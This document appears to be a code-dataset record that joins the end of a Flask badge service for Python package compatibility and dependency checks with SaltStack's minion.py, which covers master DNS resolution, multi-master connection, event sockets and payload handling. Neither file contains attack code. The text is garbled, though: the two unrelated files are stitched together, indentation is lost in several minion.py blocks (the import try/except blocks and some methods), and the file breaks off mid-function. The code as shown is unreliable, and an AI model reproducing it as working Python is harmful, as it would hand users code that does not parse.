            details = ast.literal_eval(self_comp_res.decode('utf-8'))
        except SyntaxError:
            logging.error(
                'Error occurs while converting to dict, value is {}.'.format(
                    self_comp_res))
            details = CONVERSION_ERROR_RES
    else:
        # Nothing cached yet: show the CALCULATING placeholder.
        details = version_and_res

    url = _get_badge_url(details, package_name)
    response = flask.make_response(requests.get(url).text)
    response.content_type = SVG_CONTENT_TYPE
    response.headers['Cache-Control'] = 'no-cache'
    response.add_etag()
    return response
@app.route('/self_compatibility_badge_target')
def self_compatibility_badge_target():
    """Render the detail page behind the self compatibility badge.

    The cached result maps each interpreter to its status and details,
    e.g. {
        'py2': {'status': 'SUCCESS', 'details': None},
        'py3': {'status': 'CHECK_WARNING', 'details': '...'},
    }
    """
    pkg = flask.request.args.get('package')
    return flask.render_template(
        'self-compatibility.html',
        package_name=pkg,
        result=_get_self_compatibility_from_cache(pkg))
@app.route('/self_dependency_badge_image')
def self_dependency_badge_image():
    """Badge showing whether a package has outdated dependencies.

    Always kicks off a background refresh, then immediately serves the
    most recent cached result (or the default) as an SVG badge.
    """
    package_name = flask.request.args.get('package')

    def run_check():
        # Result skeleton; 'status' ends up as the name of the highest
        # priority level seen among the outdated dependencies.
        res = {
            'status': 'CALCULATING',
            'details': {},
        }
        outdated = highlighter.check_package(package_name)
        deprecated_deps_list = finder.get_deprecated_dep(package_name)[1]
        deprecated_deps = ', '.join(deprecated_deps_list)
        details = {}
        max_level = priority_level.UP_TO_DATE
        for dep in outdated:
            dep_detail = {}
            level = dep.priority.level
            if level.value > max_level.value:
                max_level = level
            dep_detail['installed_version'] = dep.installed_version
            dep_detail['latest_version'] = dep.latest_version
            dep_detail['priority'] = dep.priority.level.name
            dep_detail['detail'] = dep.priority.details
            details[dep.name] = dep_detail
        res['status'] = max_level.name
        res['details'] = details
        res['deprecated_deps'] = deprecated_deps
        url = _get_badge_url(res, package_name)
        # Write the result to memory store
        redis_client.set(
            '{}_dependency_badge'.format(package_name), res)
        return requests.get(url).text

    dependency_res = redis_client.get(
        '{}_dependency_badge'.format(package_name))
    threading.Thread(target=run_check).start()
    if dependency_res is not None:
        try:
            details = ast.literal_eval(dependency_res.decode('utf-8'))
        # ast.literal_eval raises ValueError ("malformed node or string")
        # as well as SyntaxError for input that is not a valid literal;
        # catching only SyntaxError let ValueError escape as a 500.
        except (SyntaxError, ValueError):
            logging.error(
                'Error occurs while converting to dict, value is {}.'.format(
                    dependency_res))
            details = DEP_CONVERSION_ERROR_RES
    else:
        details = DEFAULT_DEPENDENCY_RESULT
    url = _get_badge_url(details, package_name)
    response = flask.make_response(requests.get(url).text)
    response.content_type = SVG_CONTENT_TYPE
    response.headers['Cache-Control'] = 'no-cache'
    response.add_etag()
    return response
@app.route('/self_dependency_badge_target')
def self_dependency_badge_target():
    """Render the detail page behind the self dependency badge."""
    pkg = flask.request.args.get('package')
    return flask.render_template(
        'dependency-result.html',
        package_name=pkg,
        result=_get_dependency_result_from_cache(pkg))
@app.route('/google_compatibility_badge_image')
def google_compatibility_badge_image():
    """Badge showing whether a package is compatible with Google OSS Python
    packages. If all packages success, status is SUCCESS; else set status
    to one of the failure types, details can be found at the target link."""
    package_name = flask.request.args.get('package')

    def run_check():
        # Pair the queried package with every Google OSS package.
        pkg_sets = [[package_name, pkg] for pkg in configs.PKG_LIST]
        if package_name in configs.PKG_LIST:
            result = _get_pair_status_for_packages(pkg_sets)
        else:
            # Start optimistic; any non-SUCCESS pair downgrades the status
            # and records its details per package.
            version_and_res = {
                'py2': {
                    'status': 'SUCCESS',
                    'details': {},
                },
                'py3': {
                    'status': 'SUCCESS',
                    'details': {},
                }
            }
            for py_ver in [2, 3]:
                results = list(checker.get_pairwise_compatibility(
                    py_ver, pkg_sets))
                logging.warning(results)
                py_version = PY_VER_MAPPING[py_ver]
                for res in results:
                    res_item = res[0]
                    status = res_item.get('result')
                    package = res_item.get('packages')[1]
                    if status != 'SUCCESS':
                        # Ignore the package that not support for given py_ver
                        if package in \
                                configs.PKG_PY_VERSION_NOT_SUPPORTED.get(
                                    py_ver):
                            continue
                        # Status showing one of the check failures
                        version_and_res[
                            py_version]['status'] = res_item.get('result')
                        description = res_item.get('description')
                        details = EMPTY_DETAILS if description is None \
                            else description
                        version_and_res[
                            py_version]['details'][package] = details
            result = version_and_res
        # Write the result to memory store
        redis_client.set(
            '{}_google_comp_badge'.format(package_name), result)
        url = _get_badge_url(result, package_name)
        return requests.get(url).text

    google_comp_res = redis_client.get(
        '{}_google_comp_badge'.format(package_name))
    threading.Thread(target=run_check).start()
    if google_comp_res is not None:
        try:
            details = ast.literal_eval(google_comp_res.decode('utf-8'))
        # ast.literal_eval raises ValueError ("malformed node or string")
        # as well as SyntaxError for input that is not a valid literal;
        # catching only SyntaxError let ValueError escape as a 500.
        except (SyntaxError, ValueError):
            logging.error(
                'Error occurs while converting to dict, value is {}.'.format(
                    google_comp_res))
            details = CONVERSION_ERROR_RES
    else:
        details = DEFAULT_COMPATIBILITY_RESULT
    url = _get_badge_url(details, package_name)
    response = flask.make_response(requests.get(url).text)
    response.content_type = SVG_CONTENT_TYPE
    response.headers['Cache-Control'] = 'no-cache'
    response.add_etag()
    return response
@app.route('/google_compatibility_badge_target')
def google_compatibility_badge_target():
    """Render the detail page behind the Google compatibility badge.

    The cached result maps each interpreter to its status and per-package
    details, e.g. {
        'py2': {'status': 'SUCCESS', 'details': None},
        'py3': {'status': 'CHECK_WARNING', 'details': {'package1': '...'}},
    }
    """
    pkg = flask.request.args.get('package')
    return flask.render_template(
        'google-compatibility.html',
        package_name=pkg,
        result=_get_google_compatibility_from_cache(pkg))
if __name__ == '__main__':
    # Direct-execution entry point: serve the badge app on all interfaces,
    # port 8080 (production deployments front this with their own server).
    app.run(host='0.0.0.0', port=8080)
|
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.args
import salt.utils.event
import salt.utils.schedule
from salt._compat import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
    '''
    Resolve the ``master_ip`` and ``master_uri`` options for the minion.

    Masterless (``file_client: local``) minions skip DNS entirely and are
    pointed at 127.0.0.1. Otherwise the master hostname is resolved,
    optionally retrying forever at ``retry_dns`` second intervals.
    '''
    ret = {}
    # DNS lookups are pointless for a local (masterless) minion
    check_dns = opts.get('file_client', 'remote') != 'local'

    if not check_dns:
        ret['master_ip'] = '127.0.0.1'
    else:
        # Because I import salt.log below I need to re-import salt.utils here
        import salt.utils
        try:
            ret['master_ip'] = \
                salt.utils.dns_check(opts['master'], True, opts['ipv6'])
        except SaltClientError:
            if not opts['retry_dns']:
                # No retry configured: fall back to localhost
                ret['master_ip'] = '127.0.0.1'
            else:
                # Keep retrying until the master resolves
                while True:
                    import salt.log
                    msg = ('Master hostname: {0} not found. Retrying in {1} '
                           'seconds').format(opts['master'], opts['retry_dns'])
                    if salt.log.is_console_configured():
                        log.warn(msg)
                    else:
                        print('WARNING: {0}'.format(msg))
                    time.sleep(opts['retry_dns'])
                    try:
                        ret['master_ip'] = salt.utils.dns_check(
                            opts['master'], True, opts['ipv6']
                        )
                        break
                    except SaltClientError:
                        pass
        except SaltSystemExit:
            err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
                opts.get('master', 'Unknown'))
            log.error(err)
            raise SaltSystemExit(code=42, msg=err)

    # Report when the resolved address differs from the cached one
    if 'master_ip' in ret and 'master_ip' in opts:
        if ret['master_ip'] != opts['master_ip']:
            log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
                                                                           ret['master_ip'])
            )
    ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
                                                   port=opts['master_port'])
    return ret
def get_proc_dir(cachedir):
    '''
    Given the cache directory, return the directory that process data is
    stored in, creating it if it doesn't exist.

    :param cachedir: the minion cache directory
    :return: path to the ``proc`` subdirectory
    '''
    fn_ = os.path.join(cachedir, 'proc')
    try:
        # EAFP: create unconditionally instead of the racy
        # isdir()-then-makedirs() check, which could raise if another
        # process created the directory in between.
        os.makedirs(fn_)
    except OSError as exc:
        # Only swallow "already exists" when it really is a directory;
        # a plain file at this path is still an error (as before).
        if exc.errno != errno.EEXIST or not os.path.isdir(fn_):
            raise
    return fn_
def parse_args_and_kwargs(func, args, data=None):
    '''
    Wrap load_args_and_kwargs

    Deprecated alias kept for backwards compatibility; emits a Boron
    deprecation warning and delegates unchanged to load_args_and_kwargs().
    '''
    salt.utils.warn_until(
        'Boron',
        'salt.minion.parse_args_and_kwargs() has been renamed to '
        'salt.minion.load_args_and_kwargs(). Please change this function call '
        'before the Boron release of Salt.'
    )
    return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
    '''
    Detect the args and kwargs that need to be passed to a function call, and
    check them against what was passed.

    :param func: the function that will eventually be invoked
    :param args: raw argument list from the publication; entries are strings
        and/or dicts tagged with ``__kwarg__``
    :param data: publication data dict; when ``func`` accepts ``**kwargs``,
        each entry is injected as ``__pub_<key>``
    :return: tuple of (positional args list, kwargs dict)
    :raises SaltInvocationError: if a keyword argument is not accepted by
        ``func``
    '''
    argspec = salt.utils.get_function_argspec(func)
    _args = []
    _kwargs = {}
    invalid_kwargs = []
    for arg in args:
        if isinstance(arg, string_types):
            string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False)  # pylint: disable=W0632
            if string_arg:
                # Don't append the version that was just derived from parse_cli
                # above, that would result in a 2nd call to
                # salt.utils.cli.yamlify_arg(), which could mangle the input.
                _args.append(arg)
            elif string_kwarg:
                salt.utils.warn_until(
                    'Boron',
                    'The list of function args and kwargs should be parsed '
                    'by salt.utils.args.parse_input() before calling '
                    'salt.minion.load_args_and_kwargs().'
                )
                # NOTE: Python 2 idiom — dict.keys()[0] is not subscriptable
                # on Python 3.
                if argspec.keywords or string_kwarg.keys()[0] in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs.update(string_kwarg)
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}'.format(arg))
            continue

        # if the arg is a dict with __kwarg__ == True, then its a kwarg
        # (note: pop() mutates the caller's dict — the marker is consumed)
        elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
            for key, val in arg.iteritems():
                if argspec.keywords or key in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs[key] = val
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}'.format(arg))
            continue

        else:
            _args.append(arg)

    if invalid_kwargs:
        raise SaltInvocationError(
            'The following keyword arguments are not valid: {0}'
            .format(', '.join(invalid_kwargs))
        )

    if argspec.keywords and isinstance(data, dict):
        # this function accepts **kwargs, pack in the publish data
        for key, val in data.items():
            _kwargs['__pub_{0}'.format(key)] = val

    return _args, _kwargs
class SMinion(object):
    '''
    Create an object that has loaded all of the minion module functions,
    grains, modules, returners etc. The SMinion allows developers to
    generate all of the salt minion functions and present them with these
    functions for general use.
    '''
    def __init__(self, opts):
        # Late setup of the opts grains, so we can log from the grains module
        opts['grains'] = salt.loader.grains(opts)
        self.opts = opts

        # Clean out the proc directory (default /var/cache/salt/minion/proc)
        if self.opts.get('file_client', 'remote') == 'remote':
            if isinstance(self.opts['master'], list):
                # Multi-master: try each master in turn, first successful
                # module load wins
                masters = self.opts['master']
                if self.opts['random_master'] is True:
                    shuffle(masters)
                # NOTE(review): _safe_auth is disabled while cycling through
                # masters — presumably to avoid blocking on a dead master;
                # confirm against the auth code.
                self.opts['_safe_auth'] = False
                for master in masters:
                    self.opts['master'] = master
                    self.opts.update(resolve_dns(opts))
                    try:
                        self.gen_modules()
                        break
                    except SaltClientError:
                        log.warning(('Attempted to authenticate with master '
                                     '{0} and failed'.format(master)))
                        continue
            else:
                if self.opts['random_master'] is True:
                    log.warning('random_master is True but there is only one master specified. Ignoring.')
                self.opts.update(resolve_dns(opts))
                self.gen_modules()
        else:
            # Masterless (local) mode: no DNS resolution needed
            self.gen_modules()

    def gen_modules(self):
        '''
        Load all of the modules for the minion
        '''
        # NOTE(review): salt.pillar is not imported at the top of this file;
        # presumably pulled in as a side effect of another salt import —
        # confirm.
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['environment'],
        ).compile_pillar()
        self.functions = salt.loader.minion_mods(self.opts)
        self.returners = salt.loader.returners(self.opts, self.functions)
        self.states = salt.loader.states(self.opts, self.functions)
        self.rend = salt.loader.render(self.opts, self.functions)
        self.matcher = Matcher(self.opts, self.functions)
        # Allow loaded modules to trigger a reload of themselves
        self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
    '''
    Shared plumbing for the minion flavours: holds the opts dict, sets up
    the ZeroMQ context/poller and the local event pub/pull sockets, and
    evaluates the scheduler.
    '''
    def __init__(self, opts):
        # opts: the loaded minion configuration dict
        self.opts = opts

    def _init_context_and_poller(self):
        # One shared zmq context and poller for this minion's sockets
        self.context = zmq.Context()
        self.poller = zmq.Poller()

    def _prepare_minion_event_system(self):
        # Prepare the minion event system
        #
        # Start with the publish socket
        self._init_context_and_poller()

        hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
        # Only use the first 10 chars to keep longer hashes from exceeding the
        # max socket path length.
        id_hash = hash_type(self.opts['id']).hexdigest()[:10]
        epub_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pub.ipc'.format(id_hash)
        )
        # Remove stale socket files from a previous run
        if os.path.exists(epub_sock_path):
            os.unlink(epub_sock_path)
        epull_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pull.ipc'.format(id_hash)
        )
        if os.path.exists(epull_sock_path):
            os.unlink(epull_sock_path)

        self.epub_sock = self.context.socket(zmq.PUB)

        # TCP event bus is an alternative to the default IPC sockets
        if self.opts.get('ipc_mode', '') == 'tcp':
            epub_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pub_port']
            )
            epull_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pull_port']
            )
        else:
            epub_uri = 'ipc://{0}'.format(epub_sock_path)
            salt.utils.check_ipc_path_max_len(epub_uri)
            epull_uri = 'ipc://{0}'.format(epull_sock_path)
            salt.utils.check_ipc_path_max_len(epull_uri)

        log.debug(
            '{0} PUB socket URI: {1}'.format(
                self.__class__.__name__, epub_uri
            )
        )
        log.debug(
            '{0} PULL socket URI: {1}'.format(
                self.__class__.__name__, epull_uri
            )
        )

        # Check to make sure the sock_dir is available, create if not
        default_minion_sock_dir = os.path.join(
            salt.syspaths.SOCK_DIR,
            'minion'
        )
        minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)

        if not os.path.isdir(minion_sock_dir):
            # Let's try to create the directory defined on the configuration
            # file
            try:
                os.makedirs(minion_sock_dir, 0755)
            except OSError as exc:
                log.error('Could not create SOCK_DIR: {0}'.format(exc))
                # Let's not fail yet and try using the default path
                if minion_sock_dir == default_minion_sock_dir:
                    # We're already trying the default system path, stop now!
                    raise

                if not os.path.isdir(default_minion_sock_dir):
                    try:
                        os.makedirs(default_minion_sock_dir, 0755)
                    except OSError as exc:
                        log.error('Could not create SOCK_DIR: {0}'.format(exc))
                        # Let's stop at this stage
                        raise

        # Create the pull socket
        self.epull_sock = self.context.socket(zmq.PULL)

        # Securely bind the event sockets: restrict the IPC socket files'
        # permissions with a temporary umask while binding
        if self.opts.get('ipc_mode', '') != 'tcp':
            old_umask = os.umask(0177)
        try:
            log.info('Starting pub socket on {0}'.format(epub_uri))
            self.epub_sock.bind(epub_uri)
            log.info('Starting pull socket on {0}'.format(epull_uri))
            self.epull_sock.bind(epull_uri)
        finally:
            if self.opts.get('ipc_mode', '') != 'tcp':
                os.umask(old_umask)

    @staticmethod
    def process_schedule(minion, loop_interval):
        # Evaluate the minion's scheduler and shrink loop_interval when a
        # scheduled job needs a tighter polling cadence. Errors are logged,
        # never raised, so the main loop keeps running.
        try:
            minion.schedule.eval()
            # Check if scheduler requires lower loop interval than
            # the loop_interval setting
            if minion.schedule.loop_interval < loop_interval:
                loop_interval = minion.schedule.loop_interval
                log.debug(
                    'Overriding loop_interval because of scheduled jobs.'
                )
        except Exception as exc:
            log.error(
                'Exception {0} occurred in scheduled job'.format(exc)
            )
        return loop_interval
class MasterMinion(object):
    '''
    Create a fully loaded minion function object for generic use on the
    master. What makes this class different is that the pillar is
    omitted, otherwise everything else is loaded cleanly.
    '''
    def __init__(
            self,
            opts,
            returners=True,
            states=True,
            rend=True,
            matcher=True,
            whitelist=None):
        # Start from the on-disk minion config, then overlay the passed opts
        # NOTE(review): salt.config is not imported at the top of this file;
        # presumably pulled in via another salt import — confirm.
        self.opts = salt.config.minion_config(opts['conf_file'])
        self.opts.update(opts)
        self.whitelist = whitelist
        self.opts['grains'] = salt.loader.grains(opts)
        # Pillar is deliberately left empty for master-side use
        self.opts['pillar'] = {}
        # Flags selecting which loader subsystems gen_modules() builds
        self.mk_returners = returners
        self.mk_states = states
        self.mk_rend = rend
        self.mk_matcher = matcher
        self.gen_modules()

    def gen_modules(self):
        '''
        Load all of the modules for the minion
        '''
        self.functions = salt.loader.minion_mods(
            self.opts,
            whitelist=self.whitelist)
        if self.mk_returners:
            self.returners = salt.loader.returners(self.opts, self.functions)
        if self.mk_states:
            self.states = salt.loader.states(self.opts, self.functions)
        if self.mk_rend:
            self.rend = salt.loader.render(self.opts, self.functions)
        if self.mk_matcher:
            self.matcher = Matcher(self.opts, self.functions)
        # Allow loaded modules to trigger a reload of themselves
        self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
    '''
    Create a multi minion interface, this creates as many minions as are
    defined in the master option and binds each minion object to a respective
    master.
    '''
    def __init__(self, opts):
        super(MultiMinion, self).__init__(opts)

    def _gen_minions(self):
        '''
        Set up and tune in the minion options

        Returns a list containing a Minion per reachable master, or the raw
        opts dict for masters that could not be reached (so tune_in can
        retry them later). Returns False when 'master' is not a list.
        '''
        if not isinstance(self.opts['master'], list):
            log.error(
                'Attempting to start a multimaster system with one master')
            return False
        minions = []
        for master in set(self.opts['master']):
            s_opts = copy.copy(self.opts)
            s_opts['master'] = master
            try:
                minions.append(Minion(s_opts, 5, False))
            except SaltClientError:
                # Master unreachable right now — keep the opts for retry
                minions.append(s_opts)
        return minions

    def minions(self):
        '''
        Return a list of minion generators bound to the tune_in method

        The result maps master address -> {'minion': ..., 'generator': ...}
        (or the bare opts dict for masters that failed to connect).
        '''
        ret = {}
        minions = self._gen_minions()
        for minion in minions:
            if isinstance(minion, dict):
                # Connection failed earlier; stash the opts keyed by master
                ret[minion['master']] = minion
            else:
                ret[minion.opts['master']] = {
                    'minion': minion,
                    'generator': minion.tune_in_no_block()}
        return ret

    # Multi Master Tune In
    def tune_in(self):
        '''
        Bind to the masters

        Main loop: pumps the local event bus, retries failed master
        connections with exponential backoff (capped at 6x the base wait),
        and advances each per-master minion generator one step.
        '''
        self._prepare_minion_event_system()
        self.poller.register(self.epull_sock, zmq.POLLIN)

        module_refresh = False
        pillar_refresh = False

        # Prepare the minion generators
        minions = self.minions()
        loop_interval = int(self.opts['loop_interval'])
        last = time.time()
        auth_wait = self.opts['acceptance_wait_time']
        max_wait = auth_wait * 6

        while True:
            for minion in minions.values():
                if isinstance(minion, dict):
                    minion = minion['minion']
                if not hasattr(minion, 'schedule'):
                    continue
                loop_interval = self.process_schedule(minion, loop_interval)
            socks = dict(self.poller.poll(1))
            if socks.get(self.epull_sock) == zmq.POLLIN:
                try:
                    # Drain the pull socket and re-publish every package to
                    # local event listeners
                    while True:
                        package = self.epull_sock.recv(zmq.NOBLOCK)
                        if package.startswith('module_refresh'):
                            module_refresh = True
                        elif package.startswith('pillar_refresh'):
                            pillar_refresh = True
                        elif package.startswith('fire_master'):
                            tag, data = salt.utils.event.MinionEvent.unpack(package)
                            log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
                            self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
                        self.epub_sock.send(package)
                except Exception:
                    # zmq.NOBLOCK raises once the queue is drained
                    pass

            # get commands from each master
            for master, minion in minions.items():
                if 'generator' not in minion:
                    # Not yet connected to this master: retry with backoff
                    if time.time() - auth_wait > last:
                        last = time.time()
                        if auth_wait < max_wait:
                            auth_wait += auth_wait
                        try:
                            if not isinstance(minion, dict):
                                minions[master] = {'minion': minion}
                            t_minion = Minion(minion, 5, False)
                            minions[master]['minion'] = t_minion
                            minions[master]['generator'] = t_minion.tune_in_no_block()
                            auth_wait = self.opts['acceptance_wait_time']
                        except SaltClientError:
                            continue
                    else:
                        continue
                if module_refresh:
                    minion['minion'].module_refresh()
                if pillar_refresh:
                    minion['minion'].pillar_refresh()
                # Python 2 generator API (.next()); advance one iteration
                minion['generator'].next()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
    def __init__(self, opts, timeout=60, safe=True):
        '''
        Pass in the options dict

        :param opts: loaded minion configuration dict
        :param timeout: auth timeout in seconds, handed to authenticate()
        :param safe: handed to authenticate() unchanged
        '''
        self._running = None

        # Warn if ZMQ < 3.2
        if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
                        zmq.zmq_version_info() < (3, 2)):
            # PyZMQ 2.1.9 does not have zmq_version_info
            log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
                        'are known connection keep-alive issues with ZMQ < '
                        '3.2 which may result in loss of contact with '
                        'minions. Please upgrade your ZMQ!')
        # Late setup the of the opts grains, so we can log from the grains
        # module
        opts['grains'] = salt.loader.grains(opts)

        # check if master_type was altered from its default
        if opts['master_type'] != 'str':
            # check for a valid keyword
            if opts['master_type'] == 'func':
                # split module and function and try loading the module
                mod, fun = opts['master'].split('.')
                try:
                    master_mod = salt.loader.raw_mod(opts, mod, fun)
                    if not master_mod:
                        raise TypeError
                    # we take whatever the module returns as master address
                    opts['master'] = master_mod[mod + '.' + fun]()
                except TypeError:
                    msg = ('Failed to evaluate master address from '
                           'module \'{0}\''.format(opts['master']))
                    log.error(msg)
                    sys.exit(1)
                log.info('Evaluated master from module: {0}'.format(master_mod))

            # if failover is set, master has to be of type list
            elif opts['master_type'] == 'failover':
                if type(opts['master']) is list:
                    log.info('Got list of available master addresses:'
                             ' {0}'.format(opts['master']))
                else:
                    msg = ('master_type set to \'failover\' but \'master\' '
                           'is not of type list but of type '
                           '{0}'.format(type(opts['master'])))
                    log.error(msg)
                    sys.exit(1)
            else:
                msg = ('Invalid keyword \'{0}\' for variable '
                       '\'master_type\''.format(opts['master_type']))
                log.error(msg)
                sys.exit(1)

        # if we have a list of masters, loop through them and be
        # happy with the first one that allows us to connect
        if type(opts['master']) is list:
            conn = False
            # shuffle the masters and then loop through them
            local_masters = copy.copy(opts['master'])
            if opts['master_shuffle']:
                shuffle(local_masters)

            for master in local_masters:
                opts['master'] = master
                opts.update(resolve_dns(opts))
                super(Minion, self).__init__(opts)

                try:
                    # authenticate() returning 'full' means the master is
                    # full up on minions; any other answer counts as a
                    # usable connection here
                    if self.authenticate(timeout, safe) != 'full':
                        conn = True
                        break
                except SaltClientError:
                    msg = ('Master {0} could not be reached, trying '
                           'next master (if any)'.format(opts['master']))
                    log.info(msg)
                    continue

            if not conn:
                msg = ('No master could be reached or all masters denied '
                       'the minions connection attempt.')
                log.error(msg)
        # single master sign in
        else:
            opts.update(resolve_dns(opts))
            super(Minion, self).__init__(opts)
            if self.authenticate(timeout, safe) == 'full':
                msg = ('master {0} rejected the minions connection because too '
                       'many minions are already connected.'.format(opts['master']))
                log.error(msg)
                sys.exit(1)

        self.opts['pillar'] = salt.pillar.get_pillar(
            opts,
            opts['grains'],
            opts['id'],
            opts['environment'],
        ).compile_pillar()
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.functions, self.returners = self._load_modules()
        self.matcher = Matcher(self.opts, self.functions)
        self.proc_dir = get_proc_dir(opts['cachedir'])
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)

        # add default scheduling jobs to the minions scheduler
        self.schedule.add_job({
            '__mine_interval':
            {
                'function': 'mine.update',
                'minutes': opts['mine_interval'],
                'jid_include': True,
                'maxrunning': 2
            }
        })

        # add master_alive job if enabled
        if self.opts['master_alive_interval'] > 0:
            self.schedule.add_job({
                '__master_alive':
                {
                    'function': 'status.master',
                    'seconds': opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 2
                }
            })

        self.grains_cache = self.opts['grains']

        if 'proxy' in self.opts['pillar']:
            # NOTE(review): the format string uses {0} twice, so the proxy
            # dict passed as the second argument is never rendered.
            log.debug('I am {0} and I need to start some proxies for {0}'.format(self.opts['id'],
                                                                                 self.opts['pillar']['proxy']))
            for p in self.opts['pillar']['proxy']:
                log.debug('Starting {0} proxy.'.format(p))
                pid = os.fork()
                if pid > 0:
                    # parent process keeps iterating / running this minion
                    continue
                else:
                    # child process runs the proxy minion, then dies cleanly
                    proxyminion = salt.ProxyMinion()
                    proxyminion.start(self.opts['pillar']['proxy'][p])
                    self.clean_die(signal.SIGTERM, None)
        else:
            log.debug('I am {0} and I am not supposed to start any proxies. '
                      '(Likely not a problem)'.format(self.opts['id']))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
    def _load_modules(self, force_refresh=False):
        '''
        Return the functions and the returners loaded up from the loader
        module

        :param force_refresh: passed to salt.loader.grains to force a grains
            recompute
        :return: tuple of (functions, returners) loader dicts
        '''
        # if this is a *nix system AND modules_max_memory is set, lets enforce
        # a memory limit on module imports
        # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
        modules_max_memory = False
        if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
            log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
            modules_max_memory = True
            old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
            # NOTE(review): get_memory_info() is the pre-2.0 psutil API;
            # newer psutil renamed it to memory_info() — confirm pinned
            # psutil version.
            rss, vms = psutil.Process(os.getpid()).get_memory_info()
            # Cap the address space at current usage plus the configured slack
            mem_limit = rss + vms + self.opts['modules_max_memory']
            resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
        elif self.opts.get('modules_max_memory', -1) > 0:
            if not HAS_PSUTIL:
                log.error('Unable to enforce modules_max_memory because psutil is missing')
            if not HAS_RESOURCE:
                log.error('Unable to enforce modules_max_memory because resource is missing')

        self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
        functions = salt.loader.minion_mods(self.opts)
        returners = salt.loader.returners(self.opts, functions)

        # we're done, reset the limits!
        if modules_max_memory is True:
            resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
        return functions, returners
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load)
except AuthenticationError:
log.info("AES key changed, re-authenticating")
self.authenticate()
except SaltReqTimeoutError:
log.info("Master failed to respond. Preforming re-authenticating")
self.authenticate()
except Exception:
log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
    def _handle_aes(self, load, sig=None):
        '''
        Takes the AES encrypted load, checks the signature if pub signatures
        are turned on, decrypts it, and runs the encapsulated instructions

        :param load: the AES-encrypted publication payload
        :param sig: optional master signature over the load
        :raises AuthenticationError: if the signature fails to validate
        '''
        # Verify that the signature is valid
        master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')

        if sig and self.functions['config.get']('sign_pub_messages'):
            if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
                raise AuthenticationError('Message signature failed to validate.')

        try:
            data = self.crypticle.loads(load)
        except AuthenticationError:
            # decryption of the payload failed, try to re-auth but wait
            # random seconds if set in config with random_reauth_delay
            if 'random_reauth_delay' in self.opts:
                reauth_delay = randint(0, int(self.opts['random_reauth_delay']))
